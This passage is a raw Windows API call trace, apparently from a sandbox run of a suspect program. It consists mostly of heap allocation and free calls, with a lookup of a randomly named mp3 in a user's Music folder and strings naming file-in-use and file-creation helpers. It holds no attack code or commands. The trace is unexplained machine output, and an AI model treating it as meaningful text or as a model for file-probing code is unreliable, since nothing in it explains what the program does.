(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0110.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0110.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0110.782] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0110.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0110.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0110.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0110.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0110.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0110.782] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0110.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0110.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0110.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0110.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0110.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0110.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0110.782] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\MZTSENpJHOvP.mp3", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6af1030, ftCreationTime.dwHighDateTime=0x1d5e5e7, ftLastAccessTime.dwLowDateTime=0xe23eca30, ftLastAccessTime.dwHighDateTime=0x1d5e55e, ftLastWriteTime.dwLowDateTime=0xe23eca30, ftLastWriteTime.dwHighDateTime=0x1d5e55e, nFileSizeHigh=0x0, nFileSizeLow=0x10c18, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="MZTSENpJHOvP.mp3", cAlternateFileName="MZTSEN~1.MP3")) returned 0x41ac700 [0110.782] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0110.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0110.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0110.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0110.783] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0110.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0110.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0110.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d28 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0110.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0110.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0110.783] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0110.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0110.784] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0110.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0110.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21f0 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0110.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0110.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0110.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0110.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d40 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0110.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0110.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2170 [0110.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.785] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0110.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0110.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0110.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0110.786] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0110.786] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0110.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0110.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0110.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0110.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0110.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0110.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0110.787] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0110.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0110.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0110.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0110.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0110.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0110.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0110.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0110.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0110.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0110.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0110.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0110.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0110.789] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0110.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0110.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0110.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0110.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0110.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0110.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0110.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0110.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0110.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0110.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0110.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0110.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0110.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0110.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0110.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0110.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0110.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0110.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0110.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0110.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0110.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0110.791] RtlAllocateHeap 